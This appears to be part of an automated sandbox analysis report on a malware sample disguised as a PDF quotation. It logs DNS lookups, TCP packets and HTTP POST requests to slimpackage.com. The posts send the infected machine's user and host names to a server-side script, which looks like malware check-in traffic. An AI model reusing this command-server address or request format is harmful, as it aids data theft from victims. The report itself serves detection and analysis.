              Jan 14, 2022 09:54:34.371639013 CET8049865104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:34.371715069 CET4986580192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:34.496872902 CET8049865104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:34.502947092 CET8049865104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:34.503043890 CET8049865104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:34.503123045 CET4986580192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:34.503149033 CET4986580192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:34.628434896 CET8049865104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:35.457746029 CET4986680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:35.580398083 CET8049866104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:35.580612898 CET4986680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:35.583282948 CET4986680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:35.705717087 CET8049866104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:35.705868959 CET4986680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:35.832878113 CET8049866104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:35.838768005 CET8049866104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:35.838787079 CET8049866104.223.93.105192.168.2.3
              Jan 14, 2022 09:54:35.838912964 CET4986680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:35.838943005 CET4986680192.168.2.3104.223.93.105
              Jan 14, 2022 09:54:35.962656975 CET8049866104.223.93.105192.168.2.3

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 14, 2022 09:52:38.638278008 CET5745953192.168.2.38.8.8.8
              Jan 14, 2022 09:52:38.657176971 CET53574598.8.8.8192.168.2.3
              Jan 14, 2022 09:52:40.178615093 CET5787553192.168.2.38.8.8.8
              Jan 14, 2022 09:52:40.198261976 CET53578758.8.8.8192.168.2.3
              Jan 14, 2022 09:52:41.491287947 CET5415453192.168.2.38.8.8.8
              Jan 14, 2022 09:52:41.610778093 CET53541548.8.8.8192.168.2.3
              Jan 14, 2022 09:52:42.955676079 CET5280653192.168.2.38.8.8.8
              Jan 14, 2022 09:52:43.096473932 CET53528068.8.8.8192.168.2.3
              Jan 14, 2022 09:52:44.396620035 CET5391053192.168.2.38.8.8.8
              Jan 14, 2022 09:52:44.515840054 CET53539108.8.8.8192.168.2.3
              Jan 14, 2022 09:52:46.228964090 CET6402153192.168.2.38.8.8.8
              Jan 14, 2022 09:52:46.248193026 CET53640218.8.8.8192.168.2.3
              Jan 14, 2022 09:52:48.792082071 CET6078453192.168.2.38.8.8.8
              Jan 14, 2022 09:52:48.809930086 CET53607848.8.8.8192.168.2.3
              Jan 14, 2022 09:52:50.168030977 CET5114353192.168.2.38.8.8.8
              Jan 14, 2022 09:52:50.185595036 CET53511438.8.8.8192.168.2.3
              Jan 14, 2022 09:52:51.662257910 CET5600953192.168.2.38.8.8.8
              Jan 14, 2022 09:52:51.680947065 CET53560098.8.8.8192.168.2.3
              Jan 14, 2022 09:52:53.089287043 CET5902653192.168.2.38.8.8.8
              Jan 14, 2022 09:52:53.108489990 CET53590268.8.8.8192.168.2.3
              Jan 14, 2022 09:52:54.513963938 CET4957253192.168.2.38.8.8.8
              Jan 14, 2022 09:52:54.534598112 CET53495728.8.8.8192.168.2.3
              Jan 14, 2022 09:52:57.062278032 CET5213053192.168.2.38.8.8.8
              Jan 14, 2022 09:52:57.081229925 CET53521308.8.8.8192.168.2.3
              Jan 14, 2022 09:52:59.459840059 CET5510253192.168.2.38.8.8.8
              Jan 14, 2022 09:52:59.479227066 CET53551028.8.8.8192.168.2.3
              Jan 14, 2022 09:53:01.961615086 CET5623653192.168.2.38.8.8.8
              Jan 14, 2022 09:53:01.981122017 CET53562368.8.8.8192.168.2.3
              Jan 14, 2022 09:53:03.698502064 CET5652753192.168.2.38.8.8.8
              Jan 14, 2022 09:53:03.715970993 CET53565278.8.8.8192.168.2.3
              Jan 14, 2022 09:53:06.771358013 CET4955953192.168.2.38.8.8.8
              Jan 14, 2022 09:53:06.790982008 CET53495598.8.8.8192.168.2.3
              Jan 14, 2022 09:53:08.452569008 CET5265053192.168.2.38.8.8.8
              Jan 14, 2022 09:53:08.471786976 CET53526508.8.8.8192.168.2.3
              Jan 14, 2022 09:53:10.127753973 CET6329753192.168.2.38.8.8.8
              Jan 14, 2022 09:53:10.148004055 CET53632978.8.8.8192.168.2.3
              Jan 14, 2022 09:53:11.543363094 CET5836153192.168.2.38.8.8.8
              Jan 14, 2022 09:53:11.562706947 CET53583618.8.8.8192.168.2.3
              Jan 14, 2022 09:53:13.143388033 CET5361553192.168.2.38.8.8.8
              Jan 14, 2022 09:53:13.262392044 CET53536158.8.8.8192.168.2.3
              Jan 14, 2022 09:53:14.991425037 CET5072853192.168.2.38.8.8.8
              Jan 14, 2022 09:53:15.010253906 CET53507288.8.8.8192.168.2.3
              Jan 14, 2022 09:53:16.526405096 CET5377753192.168.2.38.8.8.8
              Jan 14, 2022 09:53:16.543914080 CET53537778.8.8.8192.168.2.3
              Jan 14, 2022 09:53:18.082562923 CET5710653192.168.2.38.8.8.8
              Jan 14, 2022 09:53:18.101998091 CET53571068.8.8.8192.168.2.3
              Jan 14, 2022 09:53:19.696553946 CET5805853192.168.2.38.8.8.8
              Jan 14, 2022 09:53:19.715605974 CET53580588.8.8.8192.168.2.3
              Jan 14, 2022 09:53:21.026103020 CET6436753192.168.2.38.8.8.8
              Jan 14, 2022 09:53:21.045577049 CET53643678.8.8.8192.168.2.3
              Jan 14, 2022 09:53:22.642846107 CET5153953192.168.2.38.8.8.8
              Jan 14, 2022 09:53:22.662409067 CET53515398.8.8.8192.168.2.3
              Jan 14, 2022 09:53:25.096461058 CET5539353192.168.2.38.8.8.8
              Jan 14, 2022 09:53:25.115611076 CET53553938.8.8.8192.168.2.3
              Jan 14, 2022 09:53:26.482763052 CET6345653192.168.2.38.8.8.8
              Jan 14, 2022 09:53:26.502017975 CET53634568.8.8.8192.168.2.3
              Jan 14, 2022 09:53:27.923367977 CET4925053192.168.2.38.8.8.8
              Jan 14, 2022 09:53:27.941533089 CET53492508.8.8.8192.168.2.3
              Jan 14, 2022 09:53:29.277138948 CET5307953192.168.2.38.8.8.8
              Jan 14, 2022 09:53:29.298034906 CET53530798.8.8.8192.168.2.3
              Jan 14, 2022 09:53:32.222469091 CET5670653192.168.2.38.8.8.8
              Jan 14, 2022 09:53:32.240061998 CET53567068.8.8.8192.168.2.3
              Jan 14, 2022 09:53:34.646564960 CET5356953192.168.2.38.8.8.8
              Jan 14, 2022 09:53:34.666029930 CET53535698.8.8.8192.168.2.3
              Jan 14, 2022 09:53:38.370861053 CET6285553192.168.2.38.8.8.8
              Jan 14, 2022 09:53:38.389735937 CET53628558.8.8.8192.168.2.3
              Jan 14, 2022 09:53:42.318813086 CET5104653192.168.2.38.8.8.8
              Jan 14, 2022 09:53:42.336323023 CET53510468.8.8.8192.168.2.3
              Jan 14, 2022 09:53:50.238415003 CET5346553192.168.2.38.8.8.8
              Jan 14, 2022 09:53:50.257669926 CET53534658.8.8.8192.168.2.3
              Jan 14, 2022 09:53:54.120655060 CET4929053192.168.2.38.8.8.8
              Jan 14, 2022 09:53:54.140160084 CET53492908.8.8.8192.168.2.3
              Jan 14, 2022 09:53:56.889389038 CET5975453192.168.2.38.8.8.8
              Jan 14, 2022 09:53:56.908751011 CET53597548.8.8.8192.168.2.3
              Jan 14, 2022 09:53:59.456651926 CET4923453192.168.2.38.8.8.8
              Jan 14, 2022 09:53:59.475377083 CET53492348.8.8.8192.168.2.3
              Jan 14, 2022 09:54:01.937850952 CET5872053192.168.2.38.8.8.8
              Jan 14, 2022 09:54:01.956938028 CET53587208.8.8.8192.168.2.3
              Jan 14, 2022 09:54:03.356400967 CET5744753192.168.2.38.8.8.8
              Jan 14, 2022 09:54:03.375410080 CET53574478.8.8.8192.168.2.3
              Jan 14, 2022 09:54:04.759175062 CET6358353192.168.2.38.8.8.8
              Jan 14, 2022 09:54:04.778942108 CET53635838.8.8.8192.168.2.3
              Jan 14, 2022 09:54:07.453048944 CET6409953192.168.2.38.8.8.8
              Jan 14, 2022 09:54:07.472659111 CET53640998.8.8.8192.168.2.3
              Jan 14, 2022 09:54:10.560174942 CET6461053192.168.2.38.8.8.8
              Jan 14, 2022 09:54:10.580290079 CET53646108.8.8.8192.168.2.3
              Jan 14, 2022 09:54:14.424412966 CET5198953192.168.2.38.8.8.8
              Jan 14, 2022 09:54:14.443897963 CET53519898.8.8.8192.168.2.3
              Jan 14, 2022 09:54:16.826210022 CET5315253192.168.2.38.8.8.8
              Jan 14, 2022 09:54:16.845690966 CET53531528.8.8.8192.168.2.3
              Jan 14, 2022 09:54:20.161289930 CET6159053192.168.2.38.8.8.8
              Jan 14, 2022 09:54:20.180885077 CET53615908.8.8.8192.168.2.3
              Jan 14, 2022 09:54:22.129714012 CET5607753192.168.2.38.8.8.8
              Jan 14, 2022 09:54:22.149153948 CET53560778.8.8.8192.168.2.3
              Jan 14, 2022 09:54:24.605570078 CET5795153192.168.2.38.8.8.8
              Jan 14, 2022 09:54:24.624635935 CET53579518.8.8.8192.168.2.3
              Jan 14, 2022 09:54:25.971417904 CET5327653192.168.2.38.8.8.8
              Jan 14, 2022 09:54:25.991489887 CET53532768.8.8.8192.168.2.3
              Jan 14, 2022 09:54:27.306365967 CET6013553192.168.2.38.8.8.8
              Jan 14, 2022 09:54:27.325659990 CET53601358.8.8.8192.168.2.3
              Jan 14, 2022 09:54:28.596005917 CET4984953192.168.2.38.8.8.8
              Jan 14, 2022 09:54:28.613475084 CET53498498.8.8.8192.168.2.3
              Jan 14, 2022 09:54:30.029385090 CET6025353192.168.2.38.8.8.8
              Jan 14, 2022 09:54:30.048664093 CET53602538.8.8.8192.168.2.3
              Jan 14, 2022 09:54:31.352067947 CET5870653192.168.2.38.8.8.8
              Jan 14, 2022 09:54:31.371239901 CET53587068.8.8.8192.168.2.3
              Jan 14, 2022 09:54:32.648261070 CET6267753192.168.2.38.8.8.8
              Jan 14, 2022 09:54:32.668024063 CET53626778.8.8.8192.168.2.3
              Jan 14, 2022 09:54:34.090576887 CET6259553192.168.2.38.8.8.8
              Jan 14, 2022 09:54:34.109834909 CET53625958.8.8.8192.168.2.3
              Jan 14, 2022 09:54:35.436048031 CET5118953192.168.2.38.8.8.8
              Jan 14, 2022 09:54:35.455698967 CET53511898.8.8.8192.168.2.3

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Jan 14, 2022 09:52:38.638278008 CET192.168.2.38.8.8.80x73a6Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:40.178615093 CET192.168.2.38.8.8.80x2372Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:41.491287947 CET192.168.2.38.8.8.80x22dbStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:42.955676079 CET192.168.2.38.8.8.80x10bcStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:44.396620035 CET192.168.2.38.8.8.80x81aaStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:46.228964090 CET192.168.2.38.8.8.80x43fdStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:48.792082071 CET192.168.2.38.8.8.80xfaa3Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:50.168030977 CET192.168.2.38.8.8.80x44dStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:51.662257910 CET192.168.2.38.8.8.80xadeStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:53.089287043 CET192.168.2.38.8.8.80x8db2Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:54.513963938 CET192.168.2.38.8.8.80xc253Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:57.062278032 CET192.168.2.38.8.8.80xc65eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:59.459840059 CET192.168.2.38.8.8.80xc212Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:01.961615086 CET192.168.2.38.8.8.80x791eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:03.698502064 CET192.168.2.38.8.8.80x96c6Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:06.771358013 CET192.168.2.38.8.8.80x44eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:08.452569008 CET192.168.2.38.8.8.80xd242Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:10.127753973 CET192.168.2.38.8.8.80xe5aaStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:11.543363094 CET192.168.2.38.8.8.80x5691Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:13.143388033 CET192.168.2.38.8.8.80x7cc9Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:14.991425037 CET192.168.2.38.8.8.80x7ef9Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:16.526405096 CET192.168.2.38.8.8.80x6ba7Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:18.082562923 CET192.168.2.38.8.8.80x89dStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:19.696553946 CET192.168.2.38.8.8.80x6477Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:21.026103020 CET192.168.2.38.8.8.80x5995Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:22.642846107 CET192.168.2.38.8.8.80xdc3bStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:25.096461058 CET192.168.2.38.8.8.80xbb7aStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:26.482763052 CET192.168.2.38.8.8.80xe699Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:27.923367977 CET192.168.2.38.8.8.80x9470Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:29.277138948 CET192.168.2.38.8.8.80xc434Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:32.222469091 CET192.168.2.38.8.8.80x2c67Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:34.646564960 CET192.168.2.38.8.8.80x502bStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:38.370861053 CET192.168.2.38.8.8.80x34b2Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:42.318813086 CET192.168.2.38.8.8.80x2d60Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:50.238415003 CET192.168.2.38.8.8.80x9197Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:54.120655060 CET192.168.2.38.8.8.80xb7c1Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:56.889389038 CET192.168.2.38.8.8.80x33b5Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:59.456651926 CET192.168.2.38.8.8.80x9b3cStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:01.937850952 CET192.168.2.38.8.8.80x41cfStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:03.356400967 CET192.168.2.38.8.8.80x48f0Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:04.759175062 CET192.168.2.38.8.8.80x2242Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:07.453048944 CET192.168.2.38.8.8.80xc831Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:10.560174942 CET192.168.2.38.8.8.80x389Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:14.424412966 CET192.168.2.38.8.8.80xd0beStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:16.826210022 CET192.168.2.38.8.8.80x8155Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:20.161289930 CET192.168.2.38.8.8.80xfb07Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:22.129714012 CET192.168.2.38.8.8.80x2293Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:24.605570078 CET192.168.2.38.8.8.80xf44eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:25.971417904 CET192.168.2.38.8.8.80x85e0Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:27.306365967 CET192.168.2.38.8.8.80x50f2Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:28.596005917 CET192.168.2.38.8.8.80xebb1Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:30.029385090 CET192.168.2.38.8.8.80x1a9aStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:31.352067947 CET192.168.2.38.8.8.80x371eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:32.648261070 CET192.168.2.38.8.8.80xf39eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:34.090576887 CET192.168.2.38.8.8.80x1648Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:35.436048031 CET192.168.2.38.8.8.80x4a4bStandard query (0)slimpackage.comA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Jan 14, 2022 09:52:38.657176971 CET8.8.8.8192.168.2.30x73a6No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:40.198261976 CET8.8.8.8192.168.2.30x2372No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:41.610778093 CET8.8.8.8192.168.2.30x22dbNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:43.096473932 CET8.8.8.8192.168.2.30x10bcNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:44.515840054 CET8.8.8.8192.168.2.30x81aaNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:46.248193026 CET8.8.8.8192.168.2.30x43fdNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:48.809930086 CET8.8.8.8192.168.2.30xfaa3No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:50.185595036 CET8.8.8.8192.168.2.30x44dNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:51.680947065 CET8.8.8.8192.168.2.30xadeNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:53.108489990 CET8.8.8.8192.168.2.30x8db2No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:54.534598112 CET8.8.8.8192.168.2.30xc253No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:57.081229925 CET8.8.8.8192.168.2.30xc65eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:59.479227066 CET8.8.8.8192.168.2.30xc212No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:01.981122017 CET8.8.8.8192.168.2.30x791eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:03.715970993 CET8.8.8.8192.168.2.30x96c6No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:06.790982008 CET8.8.8.8192.168.2.30x44eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:08.471786976 CET8.8.8.8192.168.2.30xd242No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:10.148004055 CET8.8.8.8192.168.2.30xe5aaNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:11.562706947 CET8.8.8.8192.168.2.30x5691No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:13.262392044 CET8.8.8.8192.168.2.30x7cc9No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:15.010253906 CET8.8.8.8192.168.2.30x7ef9No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:16.543914080 CET8.8.8.8192.168.2.30x6ba7No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:18.101998091 CET8.8.8.8192.168.2.30x89dNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:19.715605974 CET8.8.8.8192.168.2.30x6477No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:21.045577049 CET8.8.8.8192.168.2.30x5995No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:22.662409067 CET8.8.8.8192.168.2.30xdc3bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:25.115611076 CET8.8.8.8192.168.2.30xbb7aNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:26.502017975 CET8.8.8.8192.168.2.30xe699No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:27.941533089 CET8.8.8.8192.168.2.30x9470No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:29.298034906 CET8.8.8.8192.168.2.30xc434No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:32.240061998 CET8.8.8.8192.168.2.30x2c67No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:34.666029930 CET8.8.8.8192.168.2.30x502bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:38.389735937 CET8.8.8.8192.168.2.30x34b2No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:42.336323023 CET8.8.8.8192.168.2.30x2d60No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:50.257669926 CET8.8.8.8192.168.2.30x9197No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:54.140160084 CET8.8.8.8192.168.2.30xb7c1No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:56.908751011 CET8.8.8.8192.168.2.30x33b5No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:59.475377083 CET8.8.8.8192.168.2.30x9b3cNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:01.956938028 CET8.8.8.8192.168.2.30x41cfNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:03.375410080 CET8.8.8.8192.168.2.30x48f0No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:04.778942108 CET8.8.8.8192.168.2.30x2242No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:07.472659111 CET8.8.8.8192.168.2.30xc831No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:10.580290079 CET8.8.8.8192.168.2.30x389No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:14.443897963 CET8.8.8.8192.168.2.30xd0beNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:16.845690966 CET8.8.8.8192.168.2.30x8155No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:20.180885077 CET8.8.8.8192.168.2.30xfb07No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:22.149153948 CET8.8.8.8192.168.2.30x2293No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:24.624635935 CET8.8.8.8192.168.2.30xf44eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:25.991489887 CET8.8.8.8192.168.2.30x85e0No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:27.325659990 CET8.8.8.8192.168.2.30x50f2No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:28.613475084 CET8.8.8.8192.168.2.30xebb1No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:30.048664093 CET8.8.8.8192.168.2.30x1a9aNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:31.371239901 CET8.8.8.8192.168.2.30x371eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:32.668024063 CET8.8.8.8192.168.2.30xf39eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:34.109834909 CET8.8.8.8192.168.2.30x1648No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:35.455698967 CET8.8.8.8192.168.2.30x4a4bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • slimpackage.com

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.349742104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:38.800709009 CET1104OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 190
              Connection: close
              Jan 14, 2022 09:52:38.925797939 CET1105OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: 'ckav.ruhardz910646DESKTOP-716T771k08F9C4E9C79A3B52B3F739430ajSHF
              Jan 14, 2022 09:52:39.061507940 CET1105INHTTP/1.1 404 Not Found
              Date: Fri, 14 Jan 2022 08:52:37 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.349743104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:40.325541973 CET1106OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 190
              Connection: close
              Jan 14, 2022 09:52:40.452498913 CET1106OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: 'ckav.ruhardz910646DESKTOP-716T771+08F9C4E9C79A3B52B3F739430tT9mj
              Jan 14, 2022 09:52:40.603960991 CET1106INHTTP/1.1 404 Not Found
              Date: Fri, 14 Jan 2022 08:52:39 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              10192.168.2.349752104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
